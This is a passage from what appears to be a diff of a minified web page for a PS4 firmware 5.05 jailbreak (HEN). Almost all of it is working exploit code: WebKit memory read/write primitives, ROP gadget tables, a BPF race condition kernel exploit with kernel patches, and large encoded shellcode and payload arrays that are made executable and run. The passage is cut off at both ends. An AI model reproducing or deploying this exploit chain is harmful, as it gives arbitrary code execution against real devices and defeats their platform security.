whatp=thread2.pushSymbolic();thread2.push(g.mov__rdi__rsi);thread2.push(g.pop_rsp);loop1=thread2.stackBase.add32(thread2.count*8);thread2.push(1094795585);thread2.finalizeSymbolic(wherep,loop1);thread2.finalizeSymbolic(whatp,loop1.sub32(8));});var krop=new rop();var race=new rop();var ctxp=p.malloc32(8192);var ctxp1=p.malloc32(8192);var ctxp2=p.malloc32(8192);p.write8(bpf_spray.add32(16),ctxp);p.write8(ctxp.add32(80),0);p.write8(ctxp.add32(104),ctxp1);var stackshift_from_retaddr=0;p.write8(ctxp1.add32(16),o2wk(19536333));stackshift_from_retaddr+=8+88;p.write8(ctxp.add32(0),ctxp2);p.write8(ctxp.add32(16),ctxp2.add32(8));p.write8(ctxp2.add32(2000),o2wk(7271653));var iterbase=ctxp2;for(var i=0;i<15;i++){p.write8(iterbase,o2wk(19536333));stackshift_from_retaddr+=8+88;p.write8(iterbase.add32(2000+32),o2wk(7271653));p.write8(iterbase.add32(8),iterbase.add32(32));p.write8(iterbase.add32(24),iterbase.add32(32+8));iterbase=iterbase.add32(32);};var raxbase=iterbase;var rdibase=iterbase.add32(8);var memcpy=get_jmptgt(webKitBase.add32(248));memcpy=p.read8(memcpy);p.write8(raxbase,o2wk(22848539));stackshift_from_retaddr+=8;p.write8(rdibase.add32(112),o2wk(19417140));stackshift_from_retaddr+=8;p.write8(rdibase.add32(24),rdibase);p.write8(rdibase.add32(8),krop.stackBase);p.write8(raxbase.add32(48),g.mov_rbp_rsp);p.write8(rdibase,raxbase);p.write8(raxbase.add32(1056),o2wk(2566497));p.write8(raxbase.add32(64),memcpy.add32(194-144));var topofchain=stackshift_from_retaddr+40;p.write8(rdibase.add32(176),topofchain);for(var i=0;i<4096/8;i++){p.write8(krop.stackBase.add32(i*8),g.ret);};krop.count=16;var kpatch=function(offset,qword){krop.push(g.pop_rax);krop.push(kscratch);krop.push(g.mov_rax__rax__);krop.push(g.pop_rsi);krop.push(offset);krop.push(g.add_rax_rsi);krop.push(g.pop_rsi);krop.push(qword);krop.push(g.mov__rax__rsi);};var kpatch2=function(offset,offset2){krop.push(g.pop_rax);krop.push(kscratch);krop.push(g.mov_rax__rax__);krop.push(g.pop_rsi);krop.push(offset);krop.push(g.add_rax_rsi);krop.push(g.mov_rdi_rax);krop.push(g.pop_rax);krop.push(kscratch);krop.push(g.mov_rax__rax__);krop.push(g.pop_rsi);krop.push(offset2);krop.push(g.add_rax_rsi);krop.push(g.mov__rdi__rax);};p.write8(kscratch.add32(1056),g.pop_rdi);p.write8(kscratch.add32(64),g.pop_rax);p.write8(kscratch.add32(24),kscratch);krop.push(g.pop_rdi);krop.push(kscratch.add32(24));krop.push(g.mov_rbp_rsp);var rboff=topofchain-krop.count*8+40;krop.push(o2wk(2566497));krop.push(g.pop_rax);krop.push(rboff);krop.push(g.add_rdi_rax);krop.push(g.mov_rax__rdi__);krop.push(g.pop_rsi);krop.push(762);krop.push(g.add_rax_rsi);krop.push(g.mov__rdi__rax);var shellbuf=p.malloc32(4096);krop.push(g.pop_rdi);krop.push(kscratch);krop.push(g.mov__rdi__rax);krop.push(g.pop_rsi);krop.push(808116);krop.push(g.add_rax_rsi);krop.push(g.pop_rdi);krop.push(kscratch.add32(8));krop.push(g.mov__rdi__rax);krop.push(g.jmp_rax);krop.push(g.pop_rdi);krop.push(kscratch.add32(16));krop.push(g.mov__rdi__rax);krop.push(g.pop_rsi);krop.push(new int64(4294901759,4294967295));krop.push(g.and_rax_rsi);krop.push(g.mov_rdx_rax);krop.push(g.pop_rax);krop.push(kscratch.add32(8));krop.push(g.mov_rax__rax__);krop.push(g.pop_rsi);krop.push(9);krop.push(g.add_rax_rsi);krop.push(g.mov_rdi_rax);krop.push(g.mov_rax_rdx);krop.push(g.jmp_rdi);krop.push(g.pop_rax);krop.push(kscratch);krop.push(g.mov_rax__rax__);krop.push(g.pop_rsi);krop.push(221338);krop.push(g.add_rax_rsi);krop.push(g.mov_rax__rax__);krop.push(g.pop_rdi);krop.push(kscratch.add32(816));krop.push(g.mov__rdi__rax);kpatch(221338,new int64(2425420344,2425393296));kpatch(20169540,shellbuf);kpatch(new int64(4293816070,4294967295),new int64(184,3297329408));kpatch(new int64(4293470503,4294967295),new int64(0,1082624841));kpatch(new int64(4293470533,4294967295),new int64(2425388523,1922076816));kpatch(new int64(4294769332,4294967295),new int64(934690871,826654769));kpatch(828366,new int64(233,2336788480));kpatch(1329844,new int64(2428747825,2425393296));kpatch(new int64(15789236,0),new int64(2,0));kpatch2(new int64(15789244,0),new int64(4293548276,4294967295));kpatch(new int64(15789276,0),new int64(0,1));krop.push(g.pop_rax);krop.push(kscratch.add32(8));krop.push(g.mov_rax__rax__);krop.push(g.pop_rsi);krop.push(9);krop.push(g.add_rax_rsi);krop.push(g.mov_rdi_rax);krop.push(g.pop_rax);krop.push(kscratch.add32(16));krop.push(g.mov_rax__rax__);krop.push(g.jmp_rdi);krop.push(o2wk(380345));krop.push(kscratch.add32(4096));var kq=p.malloc32(16);var kev=p.malloc32(256);kev.backing[0]=sock;kev.backing[2]=131071;kev.backing[3]=1;kev.backing[4]=5;var shcode=[35817,2425393152,2425393296,2425393296,8567125,2303246336,1096172005,1398030677,2303275535,3149957588,256,551862601,1220806985,9831821,2370371584,4265616532,2370699263,3767542964,2370633744,1585456300,2169045059,1265721540,277432321,4202255,698,3867757568,524479,3607052544,960335176,1207959552,3224487561,2211839809,3698655723,1103114587,1096630620,2428722526,1032669269,4294967160,2303260209,15293925,1207959552,770247,2303262720,3271888842,1818324331,979595116,628633632,1815490864,2648,0,0,0,0,0,0,0,0,0,0,0,0,0,0];for(var i=0;i<shcode.length;i++){shellbuf.backing[i]=shcode[i];};start1();while(1){race.count=0;race.push(s[362]);race.push(g.pop_rdi);race.push(kq);race.push(g.mov__rdi__rax);race.push(g.ret);race.push(g.ret);race.push(g.ret);race.push(g.ret);race.push_write8(loop1,interrupt1);race.push(g.pop_rdi);race.push(fd);race.push(g.pop_rsi);race.push(2148549243);race.push(g.pop_rdx);race.push(bpf_valid_prog);race.push(s[54]);race.push(g.pop_rax);race.push(kq);race.push(g.mov_rax__rax__);race.push(g.mov_rdi_rax);race.push(g.pop_rsi);race.push(kev);race.push(g.pop_rdx);race.push(1);race.push(g.pop_rcx);race.push(0);race.push(g.pop_r8);race.push(0);race.push(s[363]);race.push(g.pop_rdi);race.push(fd1);race.push(g.pop_rsi);race.push(2148549243);race.push(g.pop_rdx);race.push(bpf_spray_prog);race.push(s[54]);race.push(g.pop_rax);race.push(kq);race.push(g.mov_rax__rax__);race.push(g.mov_rdi_rax);race.push(s[6]);race.run();if(kscratch.backing[0]!=0){p.syscall(74,shellbuf,16384,7);p.fcall(shellbuf);break;};};};var createThread=webKitBase.add32(7836560);var payloadbuf=p.malloc32(16384);var payload=[134889,3224455168,264931657,3271651845,406684488,31,4283439220,2035477,143218944,4290824008,1224736767,4294951623,1405353983,1224378696,33614977,2370306048,1944373,3884533760,369082417,7928,3219556680,129,516560383,2168979456,131268,1103321856,1096171863,1431585109,3968026707,8567064,839892992,1221691720,1208505995,1210114497,2370357257,749973656,847989762,610044232,1653296136,4135931144,22774799,2202599424,2249132028,337,1084788040,1291845630,785430669,2370306094,3052236952,1488472064,1280262468,1229996377,2232354361,297,138906440,1213238088,1077971784,411601736,3338665985,1088,1086783488,8,339789568,0,455,2336751616,159817869,1216956417,2240497712,36444784,541231432,407013704,814189384,1207959553,5055,16777216,1086801976,4294967136,2022263039,1086802008,4294967144,537870847,3901312197,4294911304,571473918,1216726976,20368,822083584,1552271350,20385,1207959552,2244468617,6956800,2428747825,4194490,2961557248,2952815794,3348153089,1689440389,3271667712,4035299216,1627474531,4278611968,1941269,3800648704,1224116556,369090441,7536,819234246,1256914990,4280521869,1207959615,2336808585,1208493180,3221283457,2169044991,4290773222,506367,4282449920,3565536983,1962946096,3307343681,140378953,415531848,2303246385,1096637402,1096630620,4284432734,3296938210,4291330840,1547787611,1581342017,1405312833,283935560,58856,22996992,2370306048,123653,76105728,3104148260,1207959579,136594569,369082417,7408,1223067976,4263329165,13107199,0,28648,2311095552,822768835,3440771008,2332033052,1032669208,7054,18408,1032669184,7064,15336,33537536,2370306048,1798461,4384768,4290641920,1207959553,460733837,837287936,3892314112,312,2218626376,3892314139,4294966659,281314120,3277576329,180406088,3909091328,4294966596,197183304,3909091328,4294966584,2294335304,3909091328,4294966572,1338033992,3909091330,4294966560,1358006600,2303250993,3224454654,152255,3904909568,4294966533,1213449050,457063821,2202533888,3343388908,1840901,0,1552762880,2303200292,4290963678,3230007295,2303206004,1032669406,6947,4294946792,1958774271,3733538831,591236424,3892314139,4294967196,203717771,3642068296,1207959579,455030157,2045247488,2348810239,1208755324,466228621,2370306048,1773621,4284672000,2202599423,3277525188,3375449427,834679109,835858889,1032669430,6922,463345151,2370306048,1810197,898451456,6926,3347694473,4294913000,1222609407,459675021,2370306048,1768501,4279691264,3750363135,361580635,7032,3979709768,3909091354,4294967040,827377969,1224094162,451034509,826605568,3224454601,457315839,1213792256,455742861,2370306048,1764661,3922168064,4294966992,1329677400,1346459980,3811,0,1946697603,489029382,2332033050,3246987335,1964566977,2177010160,201326818,16417024,1962937344,947880416,4919,4280670069,2315254783,3224442951,1220643144,352130445,4148690944,286558937,940004488,1220607816,1964046467,1101982691,1096171863,1431585109,3968026707,4253632808,1106676041,2303317897,2336777676,9516,2370306048,3121357916,20,836733256,1494614006,1140850714,203717769,75205960,3136719180,16,441062911,2336751616,1692469,4018751488,369087025,6728,1223264588,2303516297,548946407,3120562176,20,426644991,2336751616,1681205,4018751488,437655039,2202533888,1566255300,1564564545,1598119489,1096237507,1096106326,1213420884,29420673,2303262720,612666365,536,611617096,3029025800,135204,3548989440,2337685840,35136644,4283432960,35136692,3036610560,137252,1955284992,369045540,6368,818185032,2302787717,3934523332,1157627906,2232415877,737,611093832,1224093984,280686473,1275068416,807695501,612142412,1897267024,1207959577,539253897,3343447601,2630724,1275068417,280688521,4278190080,1659669,1150110720,2303488036,1211114620,941900999,32,18618,1291202816,2303510409,4278723652,1649429,93145088,5516,612665672,144,4244999496,1207959572,2552530057,1207959552,342754701,2303197184,10495108,2370306048,1302277,2223589376,43044,93145088,4944,612665672,176,478890085,37,898320384,6248,2303250993,3709206495,1275068440,136594571,1224182092,2303520393,286654402,1207959576,406992267,2303197184,3330884063,414062079,2235891712,3867480054,1207959553,407780747,2370568192,12068020,3375431680,4130460209,414848511,4130406400,31930,4152970240,611093832,1695940416,1207959576,4028925067,1291845633,1275352717,29020553,1275068416,2303524745,1209017428,225285,2227660288,47140,1209218816,2303248009,1711809604,3122955463,536870912,4254197760,2336817151,1553205,1221734656,369090441,6184,280688177,1207959552,369094537,6144,609520460,2144784,2303262720,2159559145,1207959552,305008013,2303459328,3616099542,388634111,2336751616,1534773,3750316032,270812297,399906303,1418395648,3531935780,15500559,2370306048,20194436,4130406400,31930,3347662848,608471368,2635464464,1207959575,270812299,698,1955284992,2303461412,2227660543,78884,1712535296,908362951,536870913,1351437312,3515436036,609519948,4241877016,2336817151,1505077,1221734656,369090441,5996,2303260209,1096431,369033216,5956,609520460,3918088472,8435777,2370306048,1144589,2144768,2303459328,3616099542,376313343,2336751616,1486645,3750316032,369083785,5916,980807045,1290701132,369096585,5668,108314757,8227649,2336758251,2336760884,4279247996,1444629,1958774016,76236832,2201520932,108331007,367924735,2336751616,1476413,4178968320,3942645782,1032538128,5752,4293144901,1500949,3296806912,440,1541441860,1096565085,1096696157,3224486751,1962902856,93014037,5716,1207995208,108314757,544750408,1103360629,4283651412,1487637,3297329408,554011464,1207959574,2236098699,2340386029,4169336901,1211593983,369235339,2336751616,3682945050,54208628,2336754038,37019,1945037568,2609596425,136,3782599659,293763,2170947700,322373755,2336753268,3068858477,175866726,1223914784,364264843,2370306048,549063795,4278190080,1443605,93014016,5528,139704079,175355663,1207979403,369047691,5396,2302984427,1096637408,1398129500,418153288,612141384,2336777480,9516,2336751616,1398581,1221734656,369094537,5580,608996172,2159558920,1207959552,268045709,2428108800,1224736768,1209039245,369098377,5336,557157192,1207959573,3230003081,632865673,260050698,369088581,5508,415531848,1566300297,1096106435,2303219028,1213289469,822640523,4273793243,2236153855,1208251584,1209030795,369094537,5212,2302787717,2198238660,1946158205,3682945102,2204518772,1963085947,2878164034,608,3908012364,4294967106,796246149,41146,4001975296,1172277576,369091633,5388,2696645960,3120562176,864,369096241,5360,280007,1509949440,1541441860,1096565085,1398129501,1375570248,142576456,870898481,1224736766,74760325,274238280,4293888328,1299221,1975551232,75334406,1209758720,376757125,33569665,242548736,612076872,4294885864,71666175,1532674097,2193212253,264241152,3515435058,551665992,264767816,2303247904,3800123634,4294901759,2629968399,2370370143,4294936853,2290960639,4294966848,3341150849,3391684708,3311505545,2370306148,4294893589,82477567,687891669,1083214282,1207985363,4182644109,3934388223,6439018,2424949289,6438566,2752875848,2181038077,1659466474,2311727360,1659350672,361580544,4294965781,646090052,2181010773,1789725162,3358146816,2302986793,1789466240,1167100160,1459645099,3324120989,1220555203,359989125,2701495112,1207959571,2236088459,1208382656,1965062203,2236138482,1213421055,1951595401,898451495,4256,332535295,2236088320,3314108608,2370310772,1084221,2501246720,1207959571,351373,3750316120,637492571,4892,1222324563,1209068675,594870149,1963081603,1955416094,369035300,4840,259375237,608471880,1222324488,17332355,1220776975,2299577475,1103322072,1096171863,1431585109,3968026707,4270410024,612142408,2836791064,1090519058,1946238595,4152970269,4294942696,1975551487,4152970257,310777343,2302738432,11397568,2336292864,45746246,1275068416,316550539,2336751616,1236789,1049314560,136594569,1706495813,3071230220,21040709,3965929924,4293888328,1249045,213401856,1207959552,2303246469,1231582403,1211659915,2303257225,3373662175,1224736786,1211661963,2303519369,3105226734,1090519058,132807,2303459328,1720272375,85327624,1224736786,1211661963,2303257225,608471518,2434137868,2332033042,1158161476,2336767625,1202997,3750316032,138840385,311825919,2336489472,1208755268,1529398403,1572899140,1564564545,1598119489,1431585219,4253632595,2699854152,2197815296,2303263039,1208776140,1031075461,1977910605,2302077740,1208755284,3894686857,4294966940,607423304,1418444933,3681881124,1222740300,369094537,4496,79849,4018751488,4294866920,1975551487,1489674,4041801728,1207959552,270824589,4293888328,1138453,2311095552,3632598979,2332033024,4169334853,1208972545,1211651467,2215629445,175,4169362411,3162836738,1207959552,255358347,252464823,1209550519,1222660493,1208344769,2202583593,2249146362,162,252699264,39301,1418545152,2236096518,259028178,1208895159,99469,1224736767,2169030145,34878,1209431296,1208534659,405044365,35002,1695940352,3942645777,272796461,4261428582,2370322549,3122144380,136,3912600904,4278190094,1131285,1149978624,2336755748,1149847552,2370312228,3122144372,136,4293364044,1123093,3138710272,3,494341611,49840998,767277172,2298478592,3140348888,4294967261,3686528491,3959422975,272459502,1721464062,1979586621,2089634013,2293897252,1207959552,232666509,2481651712,2697232712,1526726656,3277603165,1213421121,1293479043,2303260293,1277064443,2303260553,1208493140,3894686857,4294966556,607423304,2336800901,1963467860,3296938000,3750316056,4284367195,1053477,71485184,0,415531848,1096532017,1213580126,1463936393,1430345281,1213420609,1210641539,1224754571,2337079177,2303199334,1854622963,1988838488,3096135748,4294966840,1346800456,1224705352,2345158025,1166624838,3213103044,2197815296,2303197503,309639253,4294745064,1975551487,1435191305,10807736,2303459328,3828434407,4294715624,3229960447,2337014900,2336755808,384354429,838860796,3229960438,2336752756,826609776,3984936447,2303463796,4227590383,2236153855,1275360448,1292925067,2020926597,1962313032,3984936307,3440216904,251658255,961331861,2500839533,1153598656,829747337,1962313029,12402988,1207959616,692438529,3884535029,1290701125,3523211913,1271158155,1277574285,692387465,2367029226,3942645775,3293940519,1288044872,3523209097,2202540779,2303207620,4287188190,1096565083,1096696157,637492575,3812,279495,1207959552,1529398403,1547812913,1581342017,3277676353,33465,1211240384,1210114753,537907209,4069083334,4293034312,268435199,1604108834,227363066,4294966469,1083215176,2181038078,1675863785,2312186112,1675747976,227362816,4294966187,4286680388,2181012500,1677139433,1104226560,2290733097,6550873,420318536,2181038078,1680969961,2156479488,6547773,2290733353,6565836,1259179336,2181038078,1681762281,2312186112,1681646472,227362816,4294965990,3798133121,3509125219,3768486025,2639724643,3284541967,33465,1211240384,3242774921,155721953,2425178312,21708624,1561692488,1207959566,2609418381,2303197516,935701,2425178112,37236280,823494984,1207959566,3762851981,2303197809,924437,2425178112,41018392,85297480,1207959566,1133023373,2303197812,913173,2425178112,41173912,3642067272,1207959565,2118160525,2303197812,901909,2425178112,41190976,2903869768,1207959565,3196096653,2303197812,890645,2425178112,329984,957712712,1207959566,1548783757,2303197199,926485,2425178112,1007120,219515208,1207959566,3767570573,2303197200,915221,2425178112,1106592,3776285000,1207959565,3723530381,2303197207,903957,2425178112,1834448,3038087496,1207959565,4275081357,2303197211,892693,2425178112,2007920,2299889992,1207959565,67145869,2303197234,881429,2425178112,3895264,1561692488,1207959565,1585483917,2303197251,870165,2425178112,2015808,823494984,1207959565,371232909,2303197185,838421,2425178112,6497152,3038087496,1207959564,3274739853,2303197283,827157,2425178112,6540160,2299889992,1207959564,388010125,2303197284,815893,2425178112,6564224,1561692488,1207959564,3990917261,2303197281,794389,2425178112,6478160,4178938184,1207959563,3586166925,2303197282,783125,2425178112,6438400,3977611592,1207959563,3772813453,2303197282,771861,2425178112,6411824,3776285000,1207959563,3591409805,2303197215,783125,2425178112,3811856,3574958408,1207959563,742428813,2303197242,769813,2425178112,2970608,3239414088,1207959563,3482357901,2303197232,738069,2425178112,1699280,1561692488,1207959563,3959459981,2303197209,739093,2425178112,1699712,823494984,1207959563,4023423117,88604697,1701280,353732936,1207959563,184944009,1354956800,1911078961,3909091325,4294966468,4294406632,99084543,3914989568,962,1962902856,93014089,3004,1398101057,1224575304,2337020043,795429,4018751488,197793279,2370306048,281787,4001974272,1103268168,3229996287,2336754804,3682945051,3224491125,2303198187,1096637400,3224486748,1096237507,1096106326,1213420884,1228467331,3343447689,2630724,1224736768,369087881,2708,4291789633,264275272,74884,11045632,1207959553,2303247241,1978500551,1763049230,1157627914,115998513,4278190081,676629,1224093952,673469581,4292839752,668437,1103136000,846579593,2311414600,898320623,2832,1208412097,136594569,698,1293287168,1207959563,2303312005,1208710340,826655113,9103817,2303197184,3481485791,4111859711,1207959561,369090441,2556,40169,1955284992,2302945316,1209803852,2303250313,1209017420,1210074763,9291393,2303197184,2336759873,2303236934,2336761921,2303247174,1183526977,1724025295,554232513,2144976,2305163264,369047617,2732,608471880,1284196392,2336493604,1209803852,1208500363,1212203395,2303246469,1948787780,3254731016,2095659329,3750316172,157947391,2303197184,1897267167,1291845641,57996933,1294371149,158657925,608471880,1166625032,3296937984,4169745464,1547787611,1581342017,1103322945,1096171863,1431585109,3968026707,2337039704,9532,2202075136,2236153801,2911113215,1207959552,410374789,1305030981,2215624837,156,51017,3909091328,144,1221364041,2370622345,1292903540,2303247753,2089371893,4130408484,4282,4152970240,165287423,2303459328,1276126308,539255949,610044232,3136696600,48,4293364044,637717,1955154944,2336759844,3339199612,19407940,1207959552,807693449,1223067980,941907081,1076118727,1,1143227591,1,612141388,1763049288,1291845640,2302799237,1208579265,941906987,6129993,1489273672,1539868996,1096565085,1096696157,1447150431,1413567809,2370327381,491325,3968026624,1153910848,10276,3343384576,3155012,3338665984,2419598404,3338666429,2419860548,3321889216,3088720964,455361734,608486913,1153826844,3321896228,1975364,522470598,4245612739,2236153855,2198369728,2548694984,1207959552,807687309,611618120,3347662888,3905194313,4294966589,3230002481,994606197,1932534892,3951642838,4794,3821094912,898451462,1791,1222609224,673479683,150869503,3229941760,55059317,1713906780,87587715,2337019765,2236424307,832337142,1821198555,2370576420,3944359020,3321841675,2202578155,578029819,941388939,1290307913,112912777,1275068416,2202593161,21759171,4263897334,3230007295,2336807028,1210590332,359989125,825592648,2298478600,4278985796,552725,608471808,3296937996,1096637248,1096630620,1447150430,1413567809,2370327381,454453,3968026624,571728,2370306048,1211114620,539247815,0,608487240,40,608486912,1153839379,3334476836,4279575620,371475654,608487104,2784202775,859671880,3892314118,4294966248,1975551304,4291330824,77289,1418545152,2370316324,1210066036,2303248265,4229425349,3230007295,17859855,2336751616,1277699188,807695501,609520456,1220555040,3312775225,1221691720,2202583295,2204516546,1963276409,1502300394,3682945056,826649460,1686981869,2336430116,2303536692,227363040,1483,1466,4018751488,80053065,3906863432,4294966555,2232402053,174,553485129,2370359413,1209214028,2589176717,2303524913,375520,2303197184,4243712239,3230007295,8684815,2370306048,1040581299,3767094528,3238890824,3120562181,8,3908012360,4294966475,1651884165,2813562184,1291905686,2370363529,370701,375296,2303197184,4238993647,3230007295,2370322549,2467471795,3767094528,2349698376,3120562181,1,3908012360,4294966407,511033477,2108919112,1291868476,2370363529,332813,113152,2303197184,4234537199,2336817151,1210066044,359989125,1966443336,2298478598,4278985796,439061,608471808,3296937996,1096637264,1096630620,2193212254,264241152,3323989810,1223788872,4294959489,571473918,1480694977,3515435258,551665992,1221069128,3439628293,33522433,3800289817,935494637,2281832323,3524867664,3800290039,2298447107,2500811088,1515227330,1098403976,571448656,4281451462,29336811,3942645760,3018346653,1107296252,4292407480,1221145087,4292875661,2370371583,286261,4294914304,383765,1096368384,5120184,1221144832,4236514701,2370371583,283701,4294914304,375589,0,0,0,0,0,0,0,1162559814,1162559814,1162559814,1162559814,2368127638,2333877865,4285217566,307159087,2126017525,2273089628,2933584231,2873883040,1691277431,2790244714,3433740699,1067714934,1660287673,1236798084,3298746114,1456682778,359572493,2376078599,546479511,2999145027,4090755069,1328063081,1082158946,511720287,2332899422,1482074198,3933198808,373303826,658369985,2539888662,3428137313,150603146,1448475944,90543153,1817695207,191306765,946287949,993956028,4072434858,3527778027,986328841,2905997980,2997993774,1797225581,543330209,913102476,2656328406,631810352,1041404989,4028306957,3765584518,1748606166,2524975579,1097935640,401111112,520125835,1976723478,4074812823,2893352045,2983581974,3504901045,1629464511,1761085531,3167875303,1438605369,807435420,1143492840,710004226,4259009573,2593604998,3824162590,303010469,2790022186,3900690341,442889051,3113996232,1569769770,4140763348,4233779715,299611806,1648222957,1569258689,758230167,1890391491,1520483845,1151087846,4276431736,1758746168,3869512579,2879181562,274696620,74413455,3166285500,4198636983,3021968462,1805395722,3956459435,693256743,1076217921,1833492564,2222424099,614166349,1797979729,2661384232,3390598589,2040429965,3954761818,3656596945,2804584450,2728033973,2820747223,2710338896,2545889169,3250754238,520915981,355807710,2546765881,159329863,3466380265,1489547921,493938806,3863633778,2485270186,3012580038,4025523103,3277033047,3620286691,2030844592,3567818523,2966561409,8217218,3349038936,1706354733,1786250686,1523134857,3243302468,1050541511,1075266081,1103755641,265813185,3802363444,542776256,1378856719,1916044237,856863663,2954898465,2972557510,2963792729,1531714638,1352274015,2038877208,34668325,2835583119,485669431,1158269971,1951774741,69478410,3014334929,4172694730,1915400509,2263102856,138892651,1772820005,4277583645,1952539695,1702047585,3106412,0,0,0,0,0,2,822083584,0,0,65280,0,0,0,0,0,1073741824,805318656,0,1073741824,0,8388608,4294918144,4026531840,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,822083584,0,536871808,65280,0,0,0,0,0,1073741824,1073758208,0,1073741824,2,8388608,4294918144,4026531840,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1399153491,1819043176,1811958101,1701536361,1818586738,1937339231,1919972142,1666383992,1701335909,1866689644,822109554,2425393344,1929440000,1702130553,1970495341,1852141683,1752194916,862286689,1937339136,1601004916,1970496882,1885300077,1702060392,52,0,0,0,0,0,0,38633,2425393152,1701996032,101,0,0,0,0,1495131,7968779,8280595,9728347,1495175,2323579,7968823,9728391,6624,168456997,168430090,1966014474,1952539760,1397763941,1146115380,776295489,5264720,1685091631,795178081,1429492560,1413563472,1431318085,1701719632,1702112884,1459646573,1868786789,1948280173,1397760111,1313163316,775058976,3223089,1801611628,1701737061,1886596716,1811970162,1701536361,1818586738,1650816863,1919972142,1768685688,1919249250,1600939374,779319667,2020765811,1700749056,1919906418,1701016320,1852990795,1867279461,1951622241,1299477089,1819632751,1768685669,1701008226,1667393868,1702129225,1818324594,1919972142,1701642360,1952805741,1835363584,7958627,1769107571,6714478,1937339183,795698548,1835888483,1815047791,1815044713,1666409065,1937331045,1818850389,1919972142,1668481144,1937331045,1818850389,1684956499,1953724755,1867410789,1768319348,1769234787,1767337583,1700030580,29816];for(var i=0;i<payload.length;i++){payloadbuf.backing[i]=payload[i];};p.syscall(74,payloadbuf,65536,7);p.syscall(324,1);p.fcall(createThread,payloadbuf,0,p.sptr("payload"));alert("All done! Have fun with Homebrew!");done();}</script></body></html>
\ No newline at end of file
+<!DOCTYPE html><html><head><title>PS4Jailbreak 5.05 (HEN)</title><meta name=viewport content="width=device-width, initial-scale=1"><style>.loader{position:absolute;left:50%;top:50%;margin:-75px 0 0 -75px;border:10px solid #f3f3f3;border-radius:50%;border-top:10px solid #044595;border-left:10px solid #044595;width:120px;height:120px;-webkit-animation:spin 1s linear infinite}.info{overflow:hidden;position:fixed;position:absolute;top:50%;left:50%;font-size:45px;font-family:sans-serif;transform:translate(-50%,-50%)}.credits{overflow:hidden;position:fixed;position:absolute;top:90%;left:50%;font-size:16px;font-family:sans-serif;text-align:center;transform:translate(-50%,-90%)}@-webkit-keyframes spin{0%{-webkit-transform:rotate(0deg)}100%{-webkit-transform:rotate(360deg)}}</style></head><body style=margin:0><div id=loader class=loader></div><div id=done class=info style=display:none>Done.</div><div id=fail class=info style=display:none>Fail!</div><div id=footer class=credits><ul style=list-style:none;padding-left:0><li><a href=#>qwertyoruiopz</a></li><li><a href=#>flatz</a></li><li><a href=#>specter</a></li><li><a href=#>xvortex</a></li><li><a href=#>SiSTRo</a></li><li>anonymous contributors</li></ul></div><script>var p;var s={};var g={};var gc={"pop_r8":96709,"pop_r9":12268047,"pop_rax":17397,"pop_rcx":339545,"pop_rdx":1826852,"pop_rsi":586634,"pop_rdi":232890,"pop_rsp":124551,"jmp_rax":130,"jmp_rdi":2711166,"mov_rdx_rax":3488561,"mov_rdi_rax":22692143,"mov_rax_rdx":1896224,"mov_rbp_rsp":985418,"mov__rdi__rax":3857131,"mov__rdi__rsi":146114,"mov__rax__rsi":2451047,"mov_rax__rax__":444474,"mov_rax__rdi__":290553,"add_rax_rsi":1384646,"and_rax_rsi":22481823,"add_rdi_rax":5593055,"jop":800720,"ret":60,"stack_chk_fail":200,"setjmp":5368};window.onload=function(){setTimeout(exploit,3000);};window.onerror=function(e){document.getElementById("loader").style.display="none";document.getElementById("fail").style.display="block";if(e.startsWith("Error:")==true){alert(e);}else{location.reload();};};function done(){document.getElementById("loader").style.display="none";document.getElementById("done").style.display="block";};var rop=function(){this.stack=new Uint32Array(65536);this.stackBase=p.read8(p.leakval(this.stack).add32(16));this.count=0;this.clear=function(){this.count=0;this.runtime=undefined;for(var i=0;i<4080/2;i++){p.write8(this.stackBase.add32(i*8),0);};};this.pushSymbolic=function(){this.count++;return this.count-1;};this.finalizeSymbolic=function(idx,val){p.write8(this.stackBase.add32(idx*8),val);};this.push=function(val){this.finalizeSymbolic(this.pushSymbolic(),val);};this.push_write8=function(where,what){this.push(g.pop_rdi);this.push(where);this.push(g.pop_rsi);this.push(what);this.push(g.mov__rdi__rsi);};this.fcall=function(rip,rdi,rsi,rdx,rcx,r8,r9){if(rdi!=undefined){this.push(g.pop_rdi);this.push(rdi);};if(rsi!=undefined){this.push(g.pop_rsi);this.push(rsi);};if(rdx!=undefined){this.push(g.pop_rdx);this.push(rdx);};if(rcx!=undefined){this.push(g.pop_rcx);this.push(rcx);};if(r8!=undefined){this.push(g.pop_r8);this.push(r8);};if(r9!=undefined){this.push(g.pop_r9);this.push(r9);};this.push(rip);return this;};this.run=function(){var retv=p.loadchain(this,this.notimes);this.clear();return retv;};return this;};function makeid(){var text="";var possible="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";for(var i=0;i<8;i++){text+=possible.charAt(Math.floor(Math.random()*possible.length));};return text;};var instancespr=[];for(var i=0;i<4096;i++){instancespr[i]=new Uint32Array(1);instancespr[i][makeid()]=50057;};var _dview;function u2d(low,hi){if(!_dview)_dview=new DataView(new ArrayBuffer(16));_dview.setUint32(0,hi);_dview.setUint32(4,low);return _dview.getFloat64(0);};function zeroFill(number,width){width-=number.toString().length;if(width>0){return new Array(width+(/\./.test(number)?2:1)).join("0")+number;};return number+"";};function int64(low,hi){this.low=(low>>>0);this.hi=(hi>>>0);this.add32=function(val){var new_lo=(((this.low>>>0)+val)&4294967295)>>>0;var new_hi=(this.hi>>>0);if(new_lo<this.low){new_hi++;};return new int64(new_lo,new_hi);};this.add32inplace=function(val){var new_lo=(((this.low>>>0)+val)&4294967295)>>>0;var new_hi=(this.hi>>>0);if(new_lo<this.low){new_hi++;};this.hi=new_hi;this.low=new_lo;};this.sub32=function(val){var new_lo=(((this.low>>>0)-val)&4294967295)>>>0;var new_hi=(this.hi>>>0);if(new_lo>(this.low)&4294967295){new_hi--;};return new int64(new_lo,new_hi);};this.sub32inplace=function(val){var new_lo=(((this.low>>>0)-val)&4294967295)>>>0;var new_hi=(this.hi>>>0);if(new_lo>(this.low)&4294967295){new_hi--;};this.hi=new_hi;this.low=new_lo;};this.toString=function(val){val=16;var lo_str=(this.low>>>0).toString(val);var hi_str=(this.hi>>>0).toString(val);if(this.hi==0)return lo_str;else{lo_str=zeroFill(lo_str,8);};return hi_str+lo_str;};return this;};var nogc=[];var tgt={a:0,b:0,c:0,d:0};var y=new ImageData(1,16384);postMessage("","*",[y.data.buffer]);var props={};for(var i=0;i<16384/2;){props[i++]={value:1111638594};props[i++]={value:tgt};};var foundLeak=undefined;var foundIndex=0;var 